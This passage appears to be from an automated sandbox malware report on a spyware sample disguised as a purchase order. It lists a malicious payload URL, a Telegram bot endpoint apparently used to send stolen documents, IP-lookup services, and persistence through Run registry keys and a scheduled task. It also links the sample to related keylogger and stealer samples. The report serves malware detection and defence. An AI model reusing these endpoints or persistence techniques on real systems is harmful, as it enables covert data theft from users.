                                            http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://ocsp.sectigo.com0PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.23006549497.0000000004A37000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000007.00000002.23006549497.0000000004A37000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.23006549497.0000000004A37000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://reallyfreegeoip.orgdMicrosofts.exe, 00000006.00000002.24180228176.0000000002CFC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.microsoft.copowershell.exe, 00000007.00000002.23005690561.0000000003119000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://contoso.com/Licensepowershell.exe, 00000007.00000002.23019273945.000000000594F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://contoso.com/Iconpowershell.exe, 00000007.00000002.23019273945.000000000594F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://reallyfreegeoip.org/xml/102.129.153.238dMicrosofts.exe, 00000006.00000002.24180228176.0000000002CDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://support.google.com/chrome/?p=plugin_flashMicrosofts.exe, 00000006.00000002.24180228176.0000000002D3C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://checkip.dyndns.orgMicrosofts.exe, 00000006.00000002.24180228176.0000000002CDF000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000006.00000002.24180228176.0000000002CD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.apache.org/licenses/LICENSE-2.0.html4powershell.exe, 00000007.00000002.23006549497.0000000004A37000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.23006549497.0000000004A37000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://github.com/Pester/Pester4powershell.exe, 00000007.00000002.23006549497.0000000004A37000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://lwaziacademy.com/wps/200PO_B2W984.com, 00000000.00000002.22975988044.0000000020D1D000.00000004.00001000.00020000.00000000.sdmptrue
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://checkip.dyndns.comdMicrosofts.exe, 00000006.00000002.24180228176.0000000002CDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://aka.ms/pscore6lBpowershell.exe, 00000007.00000002.23006549497.00000000048E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://reallyfreegeoip.org/xml/102.129.153.238lMicrosofts.exe, 00000006.00000002.24180228176.0000000002CDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://lwaziacademy.com/PO_B2W984.com, 00000000.00000002.22965692413.000000000090E000.00000004.00000020.00020000.00000000.sdmptrue
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://checkip.dyndns.org/qMicrosofts.exe, 00000006.00000000.22971337611.0000000000802000.00000002.00000001.01000000.0000000B.sdmp, Microsofts.exe.4.drfalse
                                                                                		high
                                                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000007.00000002.23006549497.0000000004A37000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://contoso.com/powershell.exe, 00000007.00000002.23019273945.000000000594F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.23019273945.000000000594F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://reallyfreegeoip.orgMicrosofts.exe, 00000006.00000002.24180228176.0000000002CFC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://checkip.dyndns.orgdMicrosofts.exe, 00000006.00000002.24180228176.0000000002CDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://reallyfreegeoip.orgMicrosofts.exe, 00000006.00000002.24180228176.0000000002CDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.quovadis.bm0PO_B2W984.com, 00000000.00000002.22965692413.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, Microsofts.exe, 00000006.00000002.24170624386.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.23004693323.0000000002F06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://checkip.dyndns.comMicrosofts.exe, 00000006.00000002.24180228176.0000000002CDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://ocsp.quovadisoffshore.com0PO_B2W984.com, 00000000.00000002.22965692413.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, Microsofts.exe, 00000006.00000002.24170624386.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.23004693323.0000000002F06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://checkip.dyndns.org/dMicrosofts.exe, 00000006.00000002.24180228176.0000000002CDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMicrosofts.exe, 00000006.00000002.24180228176.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.23006549497.00000000048E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://ocsp.sectigo.com0CPO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23075899157.0000000021520000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000003.23137306442.00000000007C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://api.telegram.org/bot-/sendDocument?chat_id=Microsofts.exe, 00000006.00000000.22971337611.0000000000802000.00000002.00000001.01000000.0000000B.sdmp, Microsofts.exe.4.drfalse
                                                                                                      		high
                                                                                                      http://www.pmail.com0PO_B2W984.com, 00000000.00000003.22961850687.0000000022891000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22981256081.000000002293B000.00000004.00000020.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22962642028.000000007E75A000.00000004.00001000.00020000.00000000.sdmp, PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000004.00000001.22963397742.0000000000A89000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000C.00000002.23072853329.0000000020CB5000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000010.00000002.23155674229.0000000020D19000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://lwaziacademy.com/wps/200_OupzhkprnvwEPO_B2W984.com, 00000000.00000002.22965692413.000000000095A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://reallyfreegeoip.org/xml/Microsofts.exe, 00000006.00000002.24180228176.0000000002CDF000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000006.00000000.22971337611.0000000000802000.00000002.00000001.01000000.0000000B.sdmp, Microsofts.exe.4.drfalse
                                                                                                        		high

                                                                                                        World Map of Contacted IPs

                                                                                                        • No. of IPs < 25%
                                                                                                        • 25% < No. of IPs < 50%
                                                                                                        • 50% < No. of IPs < 75%
                                                                                                        • 75% < No. of IPs

                                                                                                        Public IPs

                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                        132.226.8.169
                                                                                                        		checkip.dyndns.comUnited States
                                                                                                        		16989UTMEMUSfalse
                                                                                                        41.185.8.252
                                                                                                        		lwaziacademy.comSouth Africa
                                                                                                        		36943GridhostZAtrue
                                                                                                        104.21.67.152
                                                                                                        		reallyfreegeoip.orgUnited States
                                                                                                        		13335CLOUDFLARENETUSfalse

                                                                                                        General Information

                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                        Analysis ID:1583547
                                                                                                        Start date and time:2025-01-03 02:44:53 +01:00
                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                        Overall analysis duration:0h 12m 57s
                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                        Report type:full
                                                                                                        Cookbook file name:default.jbs
                                                                                                        Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                        Number of analysed new started processes analysed:21
                                                                                                        Number of new started drivers analysed:0
                                                                                                        Number of existing processes analysed:0
                                                                                                        Number of existing drivers analysed:0
                                                                                                        Number of injected processes analysed:0
                                                                                                        Technologies:
                                                                                                        • HCA enabled
                                                                                                        • EGA enabled
                                                                                                        • AMSI enabled
                                                                                                        Analysis Mode:default
                                                                                                        Analysis stop reason:Timeout
                                                                                                        Sample name:PO_B2W984.com
                                                                                                        Detection:MAL
                                                                                                        Classification:mal100.troj.spyw.evad.winCOM@33/17@4/3
                                                                                                        EGA Information:
                                                                                                        • Successful, ratio: 88.9%
                                                                                                        HCA Information:
                                                                                                        • Successful, ratio: 97%
                                                                                                        • Number of executed functions: 213
                                                                                                        • Number of non-executed functions: 70
                                                                                                        Cookbook Comments:
                                                                                                        • Found application associated with file extension: .com

                                                                                                        Warnings

                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe
                                                                                                        • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                                                                        • Execution Graph export aborted for target Trading_AIBot.exe, PID 1008 because it is empty
                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                        Simulations

                                                                                                        Behavior and APIs

                                                                                                        TimeTypeDescription
                                                                                                        02:47:12AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Oupzhkpr C:\Users\Public\Oupzhkpr.url
                                                                                                        02:47:16Task SchedulerRun new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
                                                                                                        02:47:21AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Oupzhkpr C:\Users\Public\Oupzhkpr.url
                                                                                                        02:47:29AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
                                                                                                        20:47:05API Interceptor2x Sleep call for process: PO_B2W984.com modified
                                                                                                        20:47:15API Interceptor9x Sleep call for process: powershell.exe modified
                                                                                                        20:47:21API Interceptor4x Sleep call for process: Oupzhkpr.PIF modified
                                                                                                        20:47:51API Interceptor87948x Sleep call for process: apihost.exe modified

                                                                                                        Joe Sandbox View / Context

                                                                                                        IPs

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        132.226.8.169PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                        • checkip.dyndns.org/
                                                                                                        Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        • checkip.dyndns.org/
                                                                                                        PARATRANSFARI REMINDER.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • checkip.dyndns.org/
                                                                                                        F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                        • checkip.dyndns.org/
                                                                                                        0001.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • checkip.dyndns.org/
                                                                                                        PK241200518-EMAIL RELEASE-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • checkip.dyndns.org/
                                                                                                        PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                        • checkip.dyndns.org/
                                                                                                        CITAS_pif.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        • checkip.dyndns.org/
                                                                                                        conferma..exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        • checkip.dyndns.org/
                                                                                                        file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • checkip.dyndns.org/
                                                                                                        41.185.8.252PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                          PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse

                                                                                                            Domains

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            reallyfreegeoip.orgfile.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 188.114.96.3
                                                                                                            file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 188.114.97.3
                                                                                                            file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 188.114.96.3
                                                                                                            PO_4027_from_IC_Tech_Inc_6908.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 188.114.96.3
                                                                                                            image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 188.114.97.3
                                                                                                            DHL DOC INV 191224.gz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 188.114.97.3
                                                                                                            file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 188.114.96.3
                                                                                                            PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 188.114.96.3
                                                                                                            PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                            • 188.114.97.3
                                                                                                            Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 188.114.96.3
                                                                                                            lwaziacademy.comPO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                            • 41.185.8.252
                                                                                                            PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                            • 41.185.8.252
                                                                                                            checkip.dyndns.comfile.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 132.226.247.73
                                                                                                            file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 193.122.130.0
                                                                                                            file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 158.101.44.242
                                                                                                            PO_4027_from_IC_Tech_Inc_6908.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 158.101.44.242
                                                                                                            image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 193.122.130.0
                                                                                                            DHL DOC INV 191224.gz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 193.122.130.0
                                                                                                            file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 193.122.6.168
                                                                                                            PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 132.226.8.169
                                                                                                            PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                            • 193.122.130.0
                                                                                                            Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 132.226.247.73

                                                                                                            ASNs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            CLOUDFLARENETUShttp://4.nscqn.dashboradcortx.xyz/4hbVgI3060FFjU163rczgakrldw288HJUBSXEIQRWLNTA425583MYLP8076x12Get hashmaliciousUnknownBrowse
                                                                                                            • 1.1.1.1
                                                                                                            ogVinh0jhq.exeGet hashmaliciousDCRatBrowse
                                                                                                            • 104.20.4.235
                                                                                                            https://myburbank-uat.3didemo.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 104.26.13.57
                                                                                                            hiwA7Blv7C.exeGet hashmaliciousXmrigBrowse
                                                                                                            • 172.67.19.24
                                                                                                            http://hotelyetipokhara.comGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.96.1
                                                                                                            https://realpaperworks.com/wp-content/red/UhPIYaGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.96.1
                                                                                                            http://adflowtube.comGet hashmaliciousUnknownBrowse
                                                                                                            • 188.114.96.3
                                                                                                            http://authmycookie.comGet hashmaliciousUnknownBrowse
                                                                                                            • 172.67.198.196
                                                                                                            http://keywestlending.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                            • 172.64.154.248
                                                                                                            http://vaporblastingservices.comGet hashmaliciousUnknownBrowse
                                                                                                            • 104.18.26.193
                                                                                                            UTMEMUSfile.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 132.226.247.73
                                                                                                            DEMONS.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 132.226.227.252
                                                                                                            PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 132.226.8.169
                                                                                                            Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 132.226.247.73
                                                                                                            Dotc67890990.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 132.226.247.73
                                                                                                            Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 132.226.8.169
                                                                                                            PARATRANSFARI REMINDER.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 132.226.8.169
                                                                                                            Invoice DHL - AWB 2024 E4001 - 0000731.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 132.226.247.73
                                                                                                            PURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            • 132.226.247.73
                                                                                                            F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                            • 132.226.8.169
                                                                                                            GridhostZAPO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                            • 41.185.8.252
                                                                                                            armv4l.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 41.61.6.129
                                                                                                            3.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 41.185.108.101
                                                                                                            2.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 41.61.164.248
                                                                                                            1.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 41.185.180.246
                                                                                                            1.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 41.61.153.3
                                                                                                            2.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 41.185.108.111
                                                                                                            mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                            • 41.185.133.158
                                                                                                            3.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 41.61.164.251
                                                                                                            ppc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                            • 41.61.164.233

                                                                                                            JA3 Fingerprints

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            54328bd36c14bd82ddaa0c04b25ed9adfile.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 104.21.67.152
                                                                                                            file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 104.21.67.152
                                                                                                            file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 104.21.67.152
                                                                                                            PO_4027_from_IC_Tech_Inc_6908.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 104.21.67.152
                                                                                                            image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 104.21.67.152
                                                                                                            DHL DOC INV 191224.gz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 104.21.67.152
                                                                                                            NL Hybrid.exeGet hashmaliciousTitanium Proxy, PureLog StealerBrowse
                                                                                                            • 104.21.67.152
                                                                                                            NL Hybrid.exeGet hashmaliciousTitanium Proxy, PureLog StealerBrowse
                                                                                                            • 104.21.67.152
                                                                                                            file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 104.21.67.152
                                                                                                            PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 104.21.67.152
                                                                                                            a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 41.185.8.252
                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 41.185.8.252
                                                                                                            image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 41.185.8.252
                                                                                                            MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zipGet hashmaliciousUnknownBrowse
                                                                                                            • 41.185.8.252
                                                                                                            MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zipGet hashmaliciousUnknownBrowse
                                                                                                            • 41.185.8.252
                                                                                                            MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zipGet hashmaliciousUnknownBrowse
                                                                                                            • 41.185.8.252
                                                                                                            Setup.exe.7zGet hashmaliciousUnknownBrowse
                                                                                                            • 41.185.8.252
                                                                                                            176.113.115.170.ps1Get hashmaliciousLummaCBrowse
                                                                                                            • 41.185.8.252
                                                                                                            ETVk1yP43q.exeGet hashmaliciousAZORultBrowse
                                                                                                            • 41.185.8.252

                                                                                                            Dropped Files

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
